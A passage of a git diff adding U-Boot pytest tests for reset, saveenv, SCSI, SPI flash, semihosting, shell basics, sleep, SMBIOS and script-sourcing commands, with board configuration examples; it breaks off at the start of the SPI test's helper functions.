SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__reset_test_skip to True if reset test is not possible or desired +# and should be skipped. +env__reset_test_skip = True + +# Setup env__reset_test to set the bootmode if 'modeboot' u-boot environment +# variable is not set. Test will be skipped if bootmode is not set in both +# places i.e, boardenv and modeboot u-boot environment variable +env__reset_test = { + 'bootmode': 'qspiboot', +} + +# This test will be also skipped if the bootmode is detected to JTAG. +""" + +import pytest +import test_000_version + +def setup_reset_env(ubman): + if ubman.config.env.get('env__reset_test_skip', False): + pytest.skip('reset test is not enabled') + + output = ubman.run_command('echo $modeboot') + if output: + bootmode = output + else: + f = ubman.config.env.get('env__reset_test', None) + if not f: + pytest.skip('bootmode cannot be determined') + bootmode = f.get('bootmode', 'jtagboot') + + if 'jtag' in bootmode: + pytest.skip('skipping reset test due to jtag bootmode') + +@pytest.mark.buildconfigspec('hush_parser') +def test_reset(ubman): + """Test the reset command in non-JTAG bootmode. + It does COLD reset, which resets CPU, DDR and peripherals + """ + setup_reset_env(ubman) + ubman.run_command('reset', wait_for_reboot=True) + + # Checks the u-boot command prompt's functionality after reset + test_000_version.test_version(ubman) + +@pytest.mark.buildconfigspec('hush_parser') +def test_reset_w(ubman): + """Test the reset -w command in non-JTAG bootmode. + It does WARM reset, which resets CPU but keep DDR/peripherals active. + """ + setup_reset_env(ubman) + ubman.run_command('reset -w', wait_for_reboot=True) + + # Checks the u-boot command prompt's functionality after reset + test_000_version.test_version(ubman) diff --git a/test/py/tests/test_sandbox_exit.py b/test/py/tests/test_sandbox_exit.py new file mode 100644 index 00000000000..9610adf1fe7 --- /dev/null +++ b/test/py/tests/test_sandbox_exit.py @@ -0,0 +1,45 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. 
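+# These tests target the sandbox build, where U-Boot runs as an ordinary host
+# process. "Powering off", sending Ctrl-C or raising an unhandled exception
+# therefore ends (or, with SANDBOX_CRASH_RESET, restarts) that process, which
+# is what ubman.validate_exited() observes in the tests below.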
+ +import pytest +import signal + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('sysreset_cmd_poweroff') +def test_poweroff(ubman): + """Test that the "poweroff" command exits sandbox process.""" + + ubman.run_command('poweroff', wait_for_prompt=False) + assert(ubman.validate_exited()) + +@pytest.mark.boardspec('sandbox') +def test_ctrl_c(ubman): + """Test that sending SIGINT to sandbox causes it to exit.""" + + ubman.kill(signal.SIGINT) + assert(ubman.validate_exited()) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_exception') +@pytest.mark.buildconfigspec('sandbox_crash_reset') +def test_exception_reset(ubman): + """Test that SIGILL causes a reset.""" + + ubman.run_command('exception undefined', wait_for_prompt=False) + m = ubman.p.expect(['resetting ...', 'U-Boot']) + if m != 0: + raise Exception('SIGILL did not lead to reset') + m = ubman.p.expect(['U-Boot', '=>']) + if m != 0: + raise Exception('SIGILL did not lead to reset') + ubman.restart_uboot() + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_exception') +@pytest.mark.notbuildconfigspec('sandbox_crash_reset') +def test_exception_exit(ubman): + """Test that SIGILL causes a reset.""" + + ubman.run_command('exception undefined', wait_for_prompt=False) + assert(ubman.validate_exited()) diff --git a/test/py/tests/test_sandbox_opts.py b/test/py/tests/test_sandbox_opts.py new file mode 100644 index 00000000000..48f5b313870 --- /dev/null +++ b/test/py/tests/test_sandbox_opts.py @@ -0,0 +1,28 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest + +import utils + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_cmdline' + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_sandbox_cmdline(ubman): + """Test building sandbox without CONFIG_CMDLINE""" + + utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', '~CMDLINE', '-o', TMPDIR]) + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_sandbox_lto(ubman): + """Test building sandbox without CONFIG_LTO""" + + utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', '~LTO', '-o', TMPDIR]) diff --git a/test/py/tests/test_saveenv.py b/test/py/tests/test_saveenv.py new file mode 100644 index 00000000000..019b229d30e --- /dev/null +++ b/test/py/tests/test_saveenv.py @@ -0,0 +1,137 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__saveenv_test_skip to True if saveenv test is not possible or +# desired and should be skipped. +env__saveenv_test_skip = True + +# Setup env__saveenv_test to set the bootmode if 'modeboot' u-boot environment +# variable is not set. Test will be skipped if bootmode is not set in both +# places i.e, boardenv and modeboot u-boot environment variable +env__saveenv_test = { + 'bootmode': 'qspiboot', +} + +# This test will be also skipped if the bootmode is detected to JTAG. 
+""" + +import pytest +import random +import ipaddress +import string +import uuid + +# Setup the env +def setup_saveenv_env(ubman): + if ubman.config.env.get('env__saveenv_test_skip', False): + pytest.skip('saveenv test is not enabled') + + output = ubman.run_command('echo $modeboot') + if output: + bootmode = output + else: + f = ubman.config.env.get('env__saveenv_test', None) + if not f: + pytest.skip('bootmode cannot be determined') + bootmode = f.get('bootmode', 'jtagboot') + + if 'jtag' in bootmode: + pytest.skip('skipping saveenv test due to jtag bootmode') + +# Check return code +def ret_code(ubman): + return ubman.run_command('echo $?') + +# Verify env variable +def check_env(ubman, var_name, var_value): + if var_value: + output = ubman.run_command(f'printenv {var_name}') + var_value = str(var_value) + if (var_value.startswith("'") and var_value.endswith("'")) or ( + var_value.startswith('"') and var_value.endswith('"') + ): + var_value = var_value.split(var_value[-1])[1] + assert var_value in output + assert ret_code(ubman).endswith('0') + else: + ubman.p.send(f'printenv {var_name}\n') + output = ubman.p.expect(['not defined']) + assert output == 0 + assert ret_code(ubman).endswith('1') + +# Set env variable +def set_env(ubman, var_name, var_value): + ubman.run_command(f'setenv {var_name} {var_value}') + assert ret_code(ubman).endswith('0') + check_env(ubman, var_name, var_value) + +@pytest.mark.buildconfigspec('cmd_saveenv') +@pytest.mark.buildconfigspec('hush_parser') +def test_saveenv(ubman): + """Test the saveenv command in non-JTAG bootmode. + It saves the U-Boot environment in persistent storage. + """ + setup_saveenv_env(ubman) + + # Set env for random mac address + rand_mac = '%02x:%02x:%02x:%02x:%02x:%02x' % ( + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + ) + set_env(ubman, 'mac_addr', rand_mac) + + # Set env for random IPv4 address + rand_ipv4 = ipaddress.IPv4Address._string_from_ip_int( + random.randint(0, ipaddress.IPv4Address._ALL_ONES) + ) + set_env(ubman, 'ipv4_addr', rand_ipv4) + + # Set env for random IPv6 address + rand_ipv6 = ipaddress.IPv6Address._string_from_ip_int( + random.randint(0, ipaddress.IPv6Address._ALL_ONES) + ) + set_env(ubman, 'ipv6_addr', rand_ipv6) + + # Set env for random number + rand_num = random.randrange(1, 10**9) + set_env(ubman, 'num_var', rand_num) + + # Set env for uuid + uuid_str = uuid.uuid4().hex.lower() + set_env(ubman, 'uuid_var', uuid_str) + + # Set env for random string including special characters + sc = "!#%&()*+,-./:;<=>?@[\\]^_`{|}~" + rand_str = ''.join( + random.choices(' ' + string.ascii_letters + sc + string.digits, k=300) + ) + set_env(ubman, 'str_var', f'"{rand_str}"') + + # Set env for empty string + set_env(ubman, 'empty_var', '') + + # Save the env variables + ubman.run_command('saveenv') + assert ret_code(ubman).endswith('0') + + # Reboot + ubman.run_command('reset', wait_for_reboot=True) + + # Verify the saved env variables + check_env(ubman, 'mac_addr', rand_mac) + check_env(ubman, 'ipv4_addr', rand_ipv4) + check_env(ubman, 'ipv6_addr', rand_ipv6) + check_env(ubman, 'num_var', rand_num) + check_env(ubman, 'uuid_var', uuid_str) + check_env(ubman, 'str_var', rand_str) + check_env(ubman, 'empty_var', '') diff --git a/test/py/tests/test_scp03.py b/test/py/tests/test_scp03.py new file mode 100644 index 00000000000..414b4251a69 --- /dev/null +++ b/test/py/tests/test_scp03.py @@ -0,0 +1,27 @@ +# Copyright (c) 
2021 Foundries.io Ltd +# +# SPDX-License-Identifier: GPL-2.0+ +# +# SCP03 command test + +""" +This tests SCP03 command in U-Boot. + +For additional details check doc/usage/scp03.rst +""" + +import pytest +import utils + +@pytest.mark.buildconfigspec('cmd_scp03') +def test_scp03(ubman): + """Enable and provision keys with SCP03 + """ + + success_str1 = "SCP03 is enabled" + success_str2 = "SCP03 is provisioned" + + response = ubman.run_command('scp03 enable') + assert success_str1 in response + response = ubman.run_command('scp03 provision') + assert success_str2 in response diff --git a/test/py/tests/test_scsi.py b/test/py/tests/test_scsi.py new file mode 100644 index 00000000000..2a35e47e558 --- /dev/null +++ b/test/py/tests/test_scsi.py @@ -0,0 +1,92 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Note: This test relies on boardenv_* containing configuration values to define +the SCSI device number, type and capacity. This test will be automatically +skipped without this. + +For example: + +# Setup env__scsi_device_test to set the SCSI device number/slot, the type of +device, and the device capacity in MB. +env__scsi_device_test = { + 'dev_num': 0, + 'device_type': 'Hard Disk', + 'device_capacity': '476940.0 MB', +} +""" + +def scsi_setup(ubman): + f = ubman.config.env.get('env__scsi_device_test', None) + if not f: + pytest.skip('No SCSI device to test') + + dev_num = f.get('dev_num', None) + if not isinstance(dev_num, int): + pytest.skip('No device number specified in env file to read') + + dev_type = f.get('device_type') + if not dev_type: + pytest.skip('No device type specified in env file to read') + + dev_size = f.get('device_capacity') + if not dev_size: + pytest.skip('No device capacity specified in env file to read') + + return dev_num, dev_type, dev_size + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_reset(ubman): + dev_num, dev_type, dev_size = scsi_setup(ubman) + output = ubman.run_command('scsi reset') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_info(ubman): + dev_num, dev_type, dev_size = scsi_setup(ubman) + output = ubman.run_command('scsi info') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_scan(ubman): + dev_num, dev_type, dev_size = scsi_setup(ubman) + output = ubman.run_command('scsi scan') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_dev(ubman): + dev_num, dev_type, dev_size = scsi_setup(ubman) + output = ubman.run_command('scsi device') + assert 'no scsi devices available' not in output + assert f'device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + output = ubman.run_command('scsi device %d' % dev_num) + assert 'is now current device' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + 
+@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_part(ubman): + test_scsi_dev(ubman) + output = ubman.run_command('scsi part') + assert 'Partition Map for scsi device' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') diff --git a/test/py/tests/test_semihosting/conftest.py b/test/py/tests/test_semihosting/conftest.py new file mode 100644 index 00000000000..b00d8f4ea9c --- /dev/null +++ b/test/py/tests/test_semihosting/conftest.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0-or-later + +"""Fixture for semihosting command test +""" + +import os +import pytest + +@pytest.fixture(scope='session') +def semihosting_data(u_boot_config): + """Set up a file system to be used in semihosting tests + + Args: + u_boot_config -- U-Boot configuration. + """ + image_path = u_boot_config.persistent_data_dir + '/semihosting.txt' + + with open(image_path, 'w', encoding = 'utf-8') as file: + file.write('Das U-Boot\n') + + yield image_path + + os.remove(image_path) diff --git a/test/py/tests/test_semihosting/test_hostfs.py b/test/py/tests/test_semihosting/test_hostfs.py new file mode 100644 index 00000000000..1bead69b507 --- /dev/null +++ b/test/py/tests/test_semihosting/test_hostfs.py @@ -0,0 +1,33 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for semihosting +""" + +import pytest + +@pytest.mark.buildconfigspec('semihosting') +def test_semihosting_hostfs(ubman, semihosting_data): + """ Unit test for semihosting + + Args: + ubman -- U-Boot console + semihosting_data -- Path to the disk image used for testing. + """ + response = ubman.run_command( + f'load hostfs - $loadaddr {semihosting_data}') + assert '11 bytes read' in response + + response = ubman.run_command( + 'crc32 $loadaddr $filesize') + assert '==> 60cfccfc' in response + + ubman.run_command( + f'save hostfs - $loadaddr {semihosting_data} 11 11') + + response = ubman.run_command( + f'load hostfs - $loadaddr {semihosting_data} 4 13') + assert '4 bytes read' in response + + response = ubman.run_command( + 'crc32 $loadaddr $filesize') + assert '==> e29063ea' in response diff --git a/test/py/tests/test_sf.py b/test/py/tests/test_sf.py new file mode 100644 index 00000000000..5b4ba80f18b --- /dev/null +++ b/test/py/tests/test_sf.py @@ -0,0 +1,217 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, Xilinx Inc. Michal Simek +# Copyright (c) 2017, Xiphos Systems Corp. All rights reserved. + +import re +import pytest +import random +import utils + +""" +Note: This test relies on boardenv_* containing configuration values to define +which SPI Flash areas are available for testing. Without this, this test will +be automatically skipped. +For example: + +# A list of sections of Flash memory to be tested. +env__sf_configs = ( + { + # Where in SPI Flash should the test operate. + 'offset': 0x00000000, + # This value is optional. + # If present, specifies the [[bus:]cs] argument used in `sf probe` + # If missing, defaults to 0. + 'id': '0:1', + # This value is optional. + # If set as a number, specifies the speed of the SPI Flash. + # If set as an array of 2, specifies a range for a random speed. + # If missing, defaults to 0. + 'speed': 1000000, + # This value is optional. + # If present, specifies the size to use for read/write operations. + # If missing, the SPI Flash page size is used as a default (based on + # the `sf probe` output). + 'len': 0x10000, + # This value is optional. + # If present, specifies if the test can write to Flash offset + # If missing, defaults to False. 
+ 'writeable': False, + # This value is optional. + # If present, specifies the expected CRC32 value of the flash area. + # If missing, extra check is ignored. + 'crc32': 0xCAFECAFE, + }, +) +""" + +def sf_prepare(ubman, env__sf_config): + """Check global state of the SPI Flash before running any test. + + Args: + ubman: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + + Returns: + sf_params: a dictionary of SPI Flash parameters. + """ + + sf_params = {} + sf_params['ram_base'] = utils.find_ram_base(ubman) + + probe_id = env__sf_config.get('id', 0) + speed = env__sf_config.get('speed', 0) + if isinstance(speed, int): + sf_params['speed'] = speed + else: + assert len(speed) == 2, "If speed is a list, it must have 2 entries" + sf_params['speed'] = random.randint(speed[0], speed[1]) + + cmd = 'sf probe %d %d' % (probe_id, sf_params['speed']) + + output = ubman.run_command(cmd) + assert 'SF: Detected' in output, 'No Flash device available' + + m = re.search('page size (.+?) Bytes', output) + assert m, 'SPI Flash page size not recognized' + sf_params['page_size'] = int(m.group(1)) + + m = re.search('erase size (.+?) KiB', output) + assert m, 'SPI Flash erase size not recognized' + sf_params['erase_size'] = int(m.group(1)) + sf_params['erase_size'] *= 1024 + + m = re.search('total (.+?) MiB', output) + assert m, 'SPI Flash total size not recognized' + sf_params['total_size'] = int(m.group(1)) + sf_params['total_size'] *= 1024 * 1024 + + assert 'offset' in env__sf_config, \ + '\'offset\' is required for this test.' + sf_params['len'] = env__sf_config.get('len', sf_params['erase_size']) + + assert not env__sf_config['offset'] % sf_params['erase_size'], \ + 'offset not multiple of erase size.' + assert not sf_params['len'] % sf_params['erase_size'], \ + 'erase length not multiple of erase size.' + + assert not (env__sf_config.get('writeable', False) and + 'crc32' in env__sf_config), \ + 'Cannot check crc32 on writeable sections' + + return sf_params + +def sf_read(ubman, env__sf_config, sf_params): + """Helper function used to read and compute the CRC32 value of a section of + SPI Flash memory. + + Args: + ubman: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + sf_params: SPI Flash parameters. + + Returns: + CRC32 value of SPI Flash section + """ + + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + pattern = random.randint(0, 0xFF) + crc_expected = env__sf_config.get('crc32', None) + + cmd = 'mw.b %08x %02x %x' % (addr, pattern, count) + ubman.run_command(cmd) + crc_pattern = utils.crc32(ubman, addr, count) + if crc_expected: + assert crc_pattern != crc_expected + + cmd = 'sf read %08x %08x %x' % (addr, offset, count) + response = ubman.run_command(cmd) + assert 'Read: OK' in response, 'Read operation failed' + crc_readback = utils.crc32(ubman, addr, count) + assert crc_pattern != crc_readback, 'sf read did not update RAM content.' + if crc_expected: + assert crc_readback == crc_expected + + return crc_readback + +def sf_update(ubman, env__sf_config, sf_params): + """Helper function used to update a section of SPI Flash memory. + + Args: + ubman: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. 
+ + Returns: + CRC32 value of SPI Flash section + """ + + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + pattern = int(random.random() * 0xFF) + + cmd = 'mw.b %08x %02x %x' % (addr, pattern, count) + ubman.run_command(cmd) + crc_pattern = utils.crc32(ubman, addr, count) + + cmd = 'sf update %08x %08x %x' % (addr, offset, count) + ubman.run_command(cmd) + crc_readback = sf_read(ubman, env__sf_config, sf_params) + + assert crc_readback == crc_pattern + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_read(ubman, env__sf_config): + sf_params = sf_prepare(ubman, env__sf_config) + sf_read(ubman, env__sf_config, sf_params) + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_read_twice(ubman, env__sf_config): + sf_params = sf_prepare(ubman, env__sf_config) + + crc1 = sf_read(ubman, env__sf_config, sf_params) + sf_params['ram_base'] += 0x100 + crc2 = sf_read(ubman, env__sf_config, sf_params) + + assert crc1 == crc2, 'CRC32 of two successive read operation do not match' + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_erase(ubman, env__sf_config): + if not env__sf_config.get('writeable', False): + pytest.skip('Flash config is tagged as not writeable') + + sf_params = sf_prepare(ubman, env__sf_config) + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + + cmd = 'sf erase %08x %x' % (offset, count) + output = ubman.run_command(cmd) + assert 'Erased: OK' in output, 'Erase operation failed' + + cmd = 'mw.b %08x ff %x' % (addr, count) + ubman.run_command(cmd) + crc_ffs = utils.crc32(ubman, addr, count) + + crc_read = sf_read(ubman, env__sf_config, sf_params) + assert crc_ffs == crc_read, 'Unexpected CRC32 after erase operation.' + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_update(ubman, env__sf_config): + if not env__sf_config.get('writeable', False): + pytest.skip('Flash config is tagged as not writeable') + + sf_params = sf_prepare(ubman, env__sf_config) + sf_update(ubman, env__sf_config, sf_params) diff --git a/test/py/tests/test_shell_basics.py b/test/py/tests/test_shell_basics.py new file mode 100644 index 00000000000..97e22af5da5 --- /dev/null +++ b/test/py/tests/test_shell_basics.py @@ -0,0 +1,45 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Test basic shell functionality, such as commands separate by semi-colons. 
+ +import pytest + +pytestmark = pytest.mark.buildconfigspec('cmd_echo') + +def test_shell_execute(ubman): + """Test any shell command.""" + + response = ubman.run_command('echo hello') + assert response.strip() == 'hello' + +def test_shell_semicolon_two(ubman): + """Test two shell commands separate by a semi-colon.""" + + cmd = 'echo hello; echo world' + response = ubman.run_command(cmd) + # This validation method ignores the exact whitespace between the strings + assert response.index('hello') < response.index('world') + +def test_shell_semicolon_three(ubman): + """Test three shell commands separate by a semi-colon, with variable + expansion dependencies between them.""" + + cmd = 'setenv list 1; setenv list ${list}2; setenv list ${list}3; ' + \ + 'echo ${list}' + response = ubman.run_command(cmd) + assert response.strip() == '123' + ubman.run_command('setenv list') + +def test_shell_run(ubman): + """Test the "run" shell command.""" + + ubman.run_command('setenv foo \'setenv monty 1; setenv python 2\'') + ubman.run_command('run foo') + response = ubman.run_command('echo ${monty}') + assert response.strip() == '1' + response = ubman.run_command('echo ${python}') + assert response.strip() == '2' + ubman.run_command('setenv foo') + ubman.run_command('setenv monty') + ubman.run_command('setenv python') diff --git a/test/py/tests/test_sleep.py b/test/py/tests/test_sleep.py new file mode 100644 index 00000000000..f1bf34e05b2 --- /dev/null +++ b/test/py/tests/test_sleep.py @@ -0,0 +1,61 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import time + +""" +Note: This test doesn't rely on boardenv_* configuration values but they can +change test behavior. + +# Setup env__sleep_accurate to False if time is not accurate on your platform +env__sleep_accurate = False + +# Setup env__sleep_time time in seconds board is set to sleep +env__sleep_time = 3 + +# Setup env__sleep_margin set a margin for any system overhead +env__sleep_margin = 0.25 + +""" + +def test_sleep(ubman): + """Test the sleep command, and validate that it sleeps for approximately + the correct amount of time.""" + + sleep_skip = ubman.config.env.get('env__sleep_accurate', True) + if not sleep_skip: + pytest.skip('sleep is not accurate') + + if ubman.config.buildconfig.get('config_cmd_sleep', 'n') != 'y': + pytest.skip('sleep command not supported') + + # 3s isn't too long, but is enough to cross a few second boundaries. + sleep_time = ubman.config.env.get('env__sleep_time', 3) + sleep_margin = ubman.config.env.get('env__sleep_margin', 0.25) + tstart = time.time() + ubman.run_command('sleep %d' % sleep_time) + tend = time.time() + elapsed = tend - tstart + assert elapsed >= (sleep_time - 0.01) + if not ubman.config.gdbserver: + # margin is hopefully enough to account for any system overhead. 
+ assert elapsed < (sleep_time + sleep_margin) + +@pytest.mark.buildconfigspec("cmd_time") +def test_time(ubman): + """Test the time command, and validate that it gives approximately the + correct amount of command execution time.""" + + sleep_skip = ubman.config.env.get("env__sleep_accurate", True) + if not sleep_skip: + pytest.skip("sleep is not accurate") + + sleep_time = ubman.config.env.get("env__sleep_time", 10) + sleep_margin = ubman.config.env.get("env__sleep_margin", 0.25) + output = ubman.run_command("time sleep %d" % sleep_time) + execute_time = float(output.split()[1]) + assert sleep_time >= (execute_time - 0.01) + if not ubman.config.gdbserver: + # margin is hopefully enough to account for any system overhead. + assert sleep_time < (execute_time + sleep_margin) diff --git a/test/py/tests/test_smbios.py b/test/py/tests/test_smbios.py new file mode 100644 index 00000000000..3b85a7cc661 --- /dev/null +++ b/test/py/tests/test_smbios.py @@ -0,0 +1,57 @@ +# SPDX-License-Identifier: GPL-2.0-or-later + +"""Test smbios command""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.notbuildconfigspec('qfw_smbios') +@pytest.mark.notbuildconfigspec('sandbox') +def test_cmd_smbios(ubman): + """Run the smbios command""" + output = ubman.run_command('smbios') + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('qfw_smbios') +@pytest.mark.notbuildconfigspec('sandbox') +# TODO: +# QEMU v8.2.0 lacks SMBIOS support for RISC-V +# Once support is available in our Docker image we can remove the constraint. +@pytest.mark.notbuildconfigspec('riscv') +def test_cmd_smbios_qemu(ubman): + """Run the smbios command on QEMU""" + output = ubman.run_command('smbios') + assert 'DMI type 1,' in output + assert 'Manufacturer: QEMU' in output + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('sandbox') +def test_cmd_smbios_sandbox(ubman): + """Run the smbios command on the sandbox""" + output = ubman.run_command('smbios') + assert 'DMI type 0,' in output + assert 'Vendor: U-Boot' in output + assert 'DMI type 1,' in output + assert 'Manufacturer: sandbox' in output + assert 'DMI type 2,' in output + assert 'DMI type 3,' in output + assert 'DMI type 4,' in output + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('sysinfo_smbios') +@pytest.mark.buildconfigspec('generate_smbios_table_verbose') +def test_cmd_smbios_sysinfo_verbose(ubman): + """Run the smbios command""" + output = ubman.run_command('smbios') + assert 'DMI type 0,' in output + assert 'Vendor: U-Boot' in output + assert 'DMI type 1,' in output + assert 'Manufacturer: linux' in output + assert 'DMI type 2,' in output + assert 'DMI type 3,' in output + assert 'DMI type 7,' in output + assert 'DMI type 4,' in output + assert 'DMI type 127,' in output diff --git a/test/py/tests/test_source.py b/test/py/tests/test_source.py new file mode 100644 index 00000000000..970d8c79869 --- /dev/null +++ b/test/py/tests/test_source.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2022 Sean Anderson <sean.anderson@seco.com> + +import os +import pytest +import utils + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('cmd_source') +@pytest.mark.buildconfigspec('fit') +def test_source(ubman): + # Compile our test script image + mkimage = os.path.join(ubman.config.build_dir, 'tools/mkimage') 
+ its = os.path.join(ubman.config.source_dir, 'test/py/tests/source.its') + fit = os.path.join(ubman.config.build_dir, 'source.itb') + utils.run_and_log(ubman, (mkimage, '-f', its, fit)) + ubman.run_command(f'host load hostfs - $loadaddr {fit}') + + assert '2' in ubman.run_command('source') + assert '1' in ubman.run_command('source :') + assert '1' in ubman.run_command('source :script-1') + assert '2' in ubman.run_command('source :script-2') + assert 'Fail' in ubman.run_command('source :not-a-script || echo Fail') + assert '2' in ubman.run_command('source \\#') + assert '1' in ubman.run_command('source \\#conf-1') + assert '2' in ubman.run_command('source \\#conf-2') + + ubman.run_command('fdt addr $loadaddr') + ubman.run_command('fdt rm /configurations default') + assert '1' in ubman.run_command('source') + assert 'Fail' in ubman.run_command('source \\# || echo Fail') + + ubman.run_command('fdt rm /images default') + assert 'Fail' in ubman.run_command('source || echo Fail') + assert 'Fail' in ubman.run_command('source \\# || echo Fail') diff --git a/test/py/tests/test_spi.py b/test/py/tests/test_spi.py new file mode 100644 index 00000000000..dd767528dbf --- /dev/null +++ b/test/py/tests/test_spi.py @@ -0,0 +1,706 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2024, Advanced Micro Devices, Inc. + +""" +Note: This test relies on boardenv_* containing configuration values to define +spi minimum and maximum frequencies at which the flash part can operate on and +these tests run at different spi frequency randomised values in the range +multiple times based on the user defined iteration value. +It also defines the SPI bus number containing the SPI-flash chip, SPI +chip-select, SPI mode, SPI flash part name and timeout parameters. If minimum +and maximum frequency is not defined, it will run on freq 0 by default. + +Without the boardenv_* configuration, this test will be automatically skipped. + +It also relies on configuration values for supported flashes for lock and +unlock cases for SPI family flash. It will run lock-unlock cases only for the +supported flash parts. 
+ +For Example: + +# Details of SPI device test parameters required for SPI device testing: + +# bus - SPI bus number to init the flash device +# chip_select - SPI chip select number to init the flash device +# min_freq - Minimum frequency in hz at which the flash part can operate, set 0 +# or None for default frequency +# max_freq - Maximum frequency in hz at which the flash part can operate, set 0 +# or None for default frequency +# mode - SPI mode to init the flash device +# part_name - SPI flash part name to be detected +# timeout - Default timeout to run the sf commands +# iteration - No of iteration to run SPI flash test + +env__spi_device_test = { + 'bus': 0, + 'chip_select': 0, + 'min_freq': 10000000, + 'max_freq': 100000000, + 'mode': 0, + 'part_name': 'n25q00a', + 'timeout': 100000, + 'iteration': 5, +} + +# supported_flash - Flash parts name which support lock-unlock functionality +env__spi_lock_unlock = { + 'supported_flash': 'mt25qu512a, n25q00a, n25q512ax3', +} +""" + +import random +import re +import pytest +import utils + +SPI_DATA = {} +EXPECTED_ERASE = 'Erased: OK' +EXPECTED_WRITE = 'Written: OK' +EXPECTED_READ = 'Read: OK' +EXPECTED_ERASE_ERRORS = [ + 'Erase operation failed', + 'Attempted to modify a protected sector', + 'Erased: ERROR', + 'is protected and cannot be erased', + 'ERROR: flash area is locked', +] +EXPECTED_WRITE_ERRORS = [ + 'ERROR: flash area is locked', + 'Program operation failed', + 'Attempted to modify a protected sector', + 'Written: ERROR', +] + +def get_params_spi(ubman): + ''' Get SPI device test parameters from boardenv file ''' + f = ubman.config.env.get('env__spi_device_test', None) + if not f: + pytest.skip('No SPI test device configured') + + bus = f.get('bus', 0) + cs = f.get('chip_select', 0) + mode = f.get('mode', 0) + part_name = f.get('part_name', None) + timeout = f.get('timeout', None) + + if not part_name: + pytest.skip('No SPI test device configured') + + return bus, cs, mode, part_name, timeout + +def spi_find_freq_range(ubman): + '''Find out minimum and maximum frequnecies that SPI device can operate''' + f = ubman.config.env.get('env__spi_device_test', None) + if not f: + pytest.skip('No SPI test device configured') + + min_f = f.get('min_freq', None) + max_f = f.get('max_freq', None) + iterations = f.get('iteration', 1) + + if not min_f: + min_f = 0 + if not max_f: + max_f = 0 + + max_f = max(max_f, min_f) + + return min_f, max_f, iterations + +def 